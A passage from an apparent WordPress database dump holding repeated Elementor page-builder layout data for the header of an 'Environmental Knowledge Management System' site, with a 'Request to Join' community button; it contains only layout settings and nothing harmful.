",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":67.3119999999999976125764078460633754730224609375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":23.01200000000000045474735088646411895751953125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19567,2864,'_elementor_version','2.7.5'),(19568,2864,'_elementor_template_type','wp-post'),(19572,2865,'_wp_page_template','elementor_canvas'),(19573,2865,'_elementor_edit_mode','builder'),(19574,2865,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":67.7740000000000009094947017729282379150390625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":22.550000000000000710542735760100185871124267578125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19575,2865,'_elementor_version','2.7.5'),(19576,2865,'_elementor_template_type','wp-post'),(19580,2866,'_wp_page_template','elementor_canvas'),(19581,2866,'_elementor_edit_mode','builder'),(19582,2866,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.35800000000000409272615797817707061767578125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":24.96600000000000108002495835535228252410888671875},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"700cb73\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-gtranslate\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19583,2866,'_elementor_version','2.7.5'),(19584,2866,'_elementor_template_type','wp-post'),(19588,2867,'_wp_page_template','elementor_canvas'),(19589,2867,'_elementor_edit_mode','builder'),(19590,2867,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.35800000000000409272615797817707061767578125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":24.96600000000000108002495835535228252410888671875},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_